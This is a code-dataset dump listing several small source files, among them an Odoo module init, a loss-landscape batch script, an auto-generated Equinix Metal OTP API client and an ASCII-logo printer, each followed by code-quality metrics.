hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7228262e083456b2487ce5bf6e23f116bc7bc268
| 185
|
py
|
Python
|
addons/event_sale/models/__init__.py
|
SHIVJITH/Odoo_Machine_Test
|
310497a9872db7844b521e6dab5f7a9f61d365a4
|
[
"Apache-2.0"
] | null | null | null |
addons/event_sale/models/__init__.py
|
SHIVJITH/Odoo_Machine_Test
|
310497a9872db7844b521e6dab5f7a9f61d365a4
|
[
"Apache-2.0"
] | null | null | null |
addons/event_sale/models/__init__.py
|
SHIVJITH/Odoo_Machine_Test
|
310497a9872db7844b521e6dab5f7a9f61d365a4
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from . import account_move
from . import event_event
from . import event_registration
from . import event_ticket
from . import sale_order
from . import product
| 20.555556
| 32
| 0.756757
| 26
| 185
| 5.192308
| 0.5
| 0.444444
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006452
| 0.162162
| 185
| 8
| 33
| 23.125
| 0.864516
| 0.113514
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
725099451a69242ff68abb3ce9817d09c6d452c3
| 1,099
|
py
|
Python
|
multi-pose/run_sequential_script.py
|
shbe-aau/multi-pose-estimation
|
0425ed9dcc7969f0281cb435615abc33c640e157
|
[
"MIT"
] | 4
|
2021-12-28T09:25:06.000Z
|
2022-01-13T12:55:44.000Z
|
multi-pose/run_sequential_script.py
|
shbe-aau/multi-view-pose-estimation
|
22cea6cd09684fe655fb2214bc14856f589048e1
|
[
"MIT"
] | null | null | null |
multi-pose/run_sequential_script.py
|
shbe-aau/multi-view-pose-estimation
|
22cea6cd09684fe655fb2214bc14856f589048e1
|
[
"MIT"
] | 1
|
2022-01-13T13:00:15.000Z
|
2022-01-13T13:00:15.000Z
|
import os
# just add all the things you want to run, one after another here.
# Will probably stop if one of them crashes though
#os.system("python train.py experiment_template.cfg")
#os.system("python train.py experiment_template.cfg")
strings = ["python show_loss_landscape.py ./output/depth/spherical_mapping_obj10_1_{}",
"python show_loss_landscape.py ./output/depth/spherical_mapping_obj10_0+3x120_{}",
"python show_loss_landscape.py ./output/depth/spherical_mapping_obj10_0+3x120v2_{}",
"python show_loss_landscape.py ./output/depth/spherical_mapping_obj10_0+3x60_{}",
"python show_loss_landscape.py ./output/depth/spherical_mapping_obj10_0+3x60v2_{}",
"python show_loss_landscape.py ./output/depth/spherical_mapping_obj10_0+3x180_{}",
"python show_loss_landscape.py ./output/depth/spherical_mapping_obj10_0+3x120+3x60_{}",
"python show_loss_landscape.py ./output/depth/spherical_mapping_obj10_0+3x120+3x60+3x180_{}",]
for s in strings:
for i in [0, 10, 100, 500, 1000]:
os.system(s.format(i))
| 52.333333
| 106
| 0.728844
| 156
| 1,099
| 4.814103
| 0.352564
| 0.106525
| 0.149134
| 0.245007
| 0.764314
| 0.764314
| 0.764314
| 0.764314
| 0.652463
| 0.652463
| 0
| 0.080819
| 0.155596
| 1,099
| 20
| 107
| 54.95
| 0.728448
| 0.197452
| 0
| 0
| 0
| 0
| 0.734322
| 0.661346
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.083333
| 0
| 0.083333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a0e0b9697ad3e67aee0406a369a4107a1f0711f9
| 22,261
|
py
|
Python
|
metal/models/otps_api.py
|
displague/metal-python
|
96e64e9ac41025d85ff6f61693165e29e1c366db
|
[
"MIT"
] | null | null | null |
metal/models/otps_api.py
|
displague/metal-python
|
96e64e9ac41025d85ff6f61693165e29e1c366db
|
[
"MIT"
] | 3
|
2021-09-27T05:10:36.000Z
|
2021-09-27T06:10:57.000Z
|
metal/models/otps_api.py
|
displague/metal-python
|
96e64e9ac41025d85ff6f61693165e29e1c366db
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Metal API
This is the API for Equinix Metal. The API allows you to programmatically interact with all of your Equinix Metal resources, including devices, networks, addresses, organizations, projects, and your user account. The official API docs are hosted at <https://metal.equinix.com/developers/api>. # noqa: E501
The version of the OpenAPI document: 1.0.0
Contact: support@equinixmetal.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from metal.api_client import ApiClient
from metal.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class OtpsApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def find_ensure_otp(self, otp, **kwargs): # noqa: E501
"""Verify user by providing an OTP # noqa: E501
It verifies the user once a valid OTP is provided. It gives back a session token, essentially logging in the user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_ensure_otp(otp, async_req=True)
>>> result = thread.get()
:param otp: OTP (required)
:type otp: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
kwargs['_return_http_data_only'] = True
return self.find_ensure_otp_with_http_info(otp, **kwargs) # noqa: E501
def find_ensure_otp_with_http_info(self, otp, **kwargs): # noqa: E501
"""Verify user by providing an OTP # noqa: E501
It verifies the user once a valid OTP is provided. It gives back a session token, essentially logging in the user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_ensure_otp_with_http_info(otp, async_req=True)
>>> result = thread.get()
:param otp: OTP (required)
:type otp: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
local_var_params = locals()
all_params = [
'otp'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method find_ensure_otp" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'otp' is set
if self.api_client.client_side_validation and ('otp' not in local_var_params or # noqa: E501
local_var_params['otp'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `otp` when calling `find_ensure_otp`") # noqa: E501
collection_formats = {}
path_params = {}
if 'otp' in local_var_params:
path_params['otp'] = local_var_params['otp'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {}
return self.api_client.call_api(
'/user/otp/verify/{otp}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def find_recovery_codes(self, **kwargs): # noqa: E501
"""Retrieve my recovery codes # noqa: E501
Returns my recovery codes. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_recovery_codes(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: RecoveryCodeList
"""
kwargs['_return_http_data_only'] = True
return self.find_recovery_codes_with_http_info(**kwargs) # noqa: E501
def find_recovery_codes_with_http_info(self, **kwargs): # noqa: E501
"""Retrieve my recovery codes # noqa: E501
Returns my recovery codes. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_recovery_codes_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(RecoveryCodeList, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method find_recovery_codes" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {
200: "RecoveryCodeList",
401: "Error",
404: "Error",
422: "Error",
}
return self.api_client.call_api(
'/user/otp/recovery-codes', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def receive_codes(self, **kwargs): # noqa: E501
"""Receive an OTP per sms # noqa: E501
Sends an OTP to the user's mobile phone. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.receive_codes(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
kwargs['_return_http_data_only'] = True
return self.receive_codes_with_http_info(**kwargs) # noqa: E501
def receive_codes_with_http_info(self, **kwargs): # noqa: E501
"""Receive an OTP per sms # noqa: E501
Sends an OTP to the user's mobile phone. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.receive_codes_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
local_var_params = locals()
all_params = [
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method receive_codes" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {}
return self.api_client.call_api(
'/user/otp/sms/receive', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def regenerate_codes(self, **kwargs): # noqa: E501
"""Generate new recovery codes # noqa: E501
Generate a new set of recovery codes. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.regenerate_codes(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: RecoveryCodeList
"""
kwargs['_return_http_data_only'] = True
return self.regenerate_codes_with_http_info(**kwargs) # noqa: E501
def regenerate_codes_with_http_info(self, **kwargs): # noqa: E501
"""Generate new recovery codes # noqa: E501
Generate a new set of recovery codes. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.regenerate_codes_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(RecoveryCodeList, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method regenerate_codes" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {
200: "RecoveryCodeList",
401: "Error",
404: "Error",
422: "Error",
}
return self.api_client.call_api(
'/user/otp/recovery-codes', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
| 40.622263
| 312
| 0.584969
| 2,457
| 22,261
| 5.05291
| 0.094831
| 0.03093
| 0.045107
| 0.034797
| 0.907692
| 0.902376
| 0.898752
| 0.895852
| 0.883528
| 0.882884
| 0
| 0.012302
| 0.346391
| 22,261
| 547
| 313
| 40.696527
| 0.840962
| 0.50694
| 0
| 0.738197
| 0
| 0
| 0.150011
| 0.038147
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038627
| false
| 0
| 0.021459
| 0
| 0.098712
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a0f63a9ac154e6acc2309c9dd4e58e3b4509eccd
| 38
|
py
|
Python
|
python/tpxvalidate/__init__.py
|
SpillChek2/opentpx
|
6f72587cc3e2869bac73a5ec19efae20ff9c5164
|
[
"Apache-2.0"
] | 41
|
2015-10-21T09:14:28.000Z
|
2021-01-08T18:46:37.000Z
|
python/tpxvalidate/__init__.py
|
SpillChek2/opentpx
|
6f72587cc3e2869bac73a5ec19efae20ff9c5164
|
[
"Apache-2.0"
] | 1
|
2021-03-13T06:39:27.000Z
|
2021-03-13T06:39:27.000Z
|
python/tpxvalidate/__init__.py
|
SpillChek2/opentpx
|
6f72587cc3e2869bac73a5ec19efae20ff9c5164
|
[
"Apache-2.0"
] | 10
|
2015-10-13T13:04:04.000Z
|
2021-10-07T05:06:17.000Z
|
import tpxvalidate.TPX_2_2 as TPX_2_2
| 19
| 37
| 0.868421
| 9
| 38
| 3.222222
| 0.555556
| 0.275862
| 0.344828
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 0.105263
| 38
| 1
| 38
| 38
| 0.735294
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
9d5d7a0b00447905a35dba172c0827a88449f0f8
| 128
|
py
|
Python
|
python/testData/completion/heavyStarPropagation/lib/_pkg1/_pkg1_1/_pkg1_1_1/_pkg1_1_1_0/_pkg1_1_1_0_1/_mod1_1_1_0_1_1.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/completion/heavyStarPropagation/lib/_pkg1/_pkg1_1/_pkg1_1_1/_pkg1_1_1_0/_pkg1_1_1_0_1/_mod1_1_1_0_1_1.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/completion/heavyStarPropagation/lib/_pkg1/_pkg1_1/_pkg1_1_1/_pkg1_1_1_0/_pkg1_1_1_0_1/_mod1_1_1_0_1_1.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
name1_1_1_0_1_1_0 = None
name1_1_1_0_1_1_1 = None
name1_1_1_0_1_1_2 = None
name1_1_1_0_1_1_3 = None
name1_1_1_0_1_1_4 = None
| 14.222222
| 24
| 0.820313
| 40
| 128
| 1.875
| 0.175
| 0.293333
| 0.24
| 0.533333
| 0.88
| 0.88
| 0.746667
| 0
| 0
| 0
| 0
| 0.318182
| 0.140625
| 128
| 9
| 25
| 14.222222
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
19c0d2ef3bda66f5bd2bf066764d516e9e86db18
| 124
|
py
|
Python
|
JIRP_code/src/__init__.py
|
adiojha629/JIRP_LRM
|
a06e3725a8f4f406a100d2a4c2c69d4e9450a2d3
|
[
"MIT"
] | 2
|
2021-09-22T13:02:55.000Z
|
2021-11-08T19:16:55.000Z
|
JIRP_lrm/src/__init__.py
|
adiojha629/JIRP_LRM
|
a06e3725a8f4f406a100d2a4c2c69d4e9450a2d3
|
[
"MIT"
] | null | null | null |
JIRP_lrm/src/__init__.py
|
adiojha629/JIRP_LRM
|
a06e3725a8f4f406a100d2a4c2c69d4e9450a2d3
|
[
"MIT"
] | null | null | null |
from src import baselines
from src import common
from src import reward_machines
from src import hrl
from src import worlds
| 20.666667
| 31
| 0.83871
| 21
| 124
| 4.904762
| 0.428571
| 0.339806
| 0.631068
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16129
| 124
| 5
| 32
| 24.8
| 0.990385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
dfb17a543ce663958bb1af4bd1af838d963bf0a4
| 440
|
py
|
Python
|
gittra/utilities/ascii.py
|
saksham1991999/GitTra
|
bfce7e989b5613a411db3d4f7c93790dab25a7e6
|
[
"MIT"
] | 2
|
2021-02-26T19:19:16.000Z
|
2021-11-05T06:23:31.000Z
|
gittra/utilities/ascii.py
|
saksham1991999/MLH-Hackathon-1
|
bfce7e989b5613a411db3d4f7c93790dab25a7e6
|
[
"MIT"
] | 15
|
2021-02-12T18:56:26.000Z
|
2021-02-25T00:09:57.000Z
|
gittra/utilities/ascii.py
|
saksham1991999/MLH-Hackathon-1
|
bfce7e989b5613a411db3d4f7c93790dab25a7e6
|
[
"MIT"
] | 1
|
2021-03-22T16:48:44.000Z
|
2021-03-22T16:48:44.000Z
|
#ASCII graphic for the logo of the project
def getAscii():
print("e88~~\\ ,e, d8 d8 ")
print("d888 \" _d88__ _d88__ 888-~\\ /~~~8e ")
print("8888 __ 888 888 888 888 88b")
print("8888 | 888 888 888 888 e88~-888")
print("Y888 | 888 888 888 888 C888 888")
print("\"88__/ 888 \"88_/ \"88_/ 888 \"88_-888 ")
| 40
| 65
| 0.436364
| 52
| 440
| 3.442308
| 0.423077
| 0.301676
| 0.301676
| 0.201117
| 0.234637
| 0.234637
| 0
| 0
| 0
| 0
| 0
| 0.365079
| 0.427273
| 440
| 10
| 66
| 44
| 0.345238
| 0.093182
| 0
| 0
| 0
| 0
| 0.550251
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| true
| 0
| 0
| 0
| 0.142857
| 0.857143
| 0
| 0
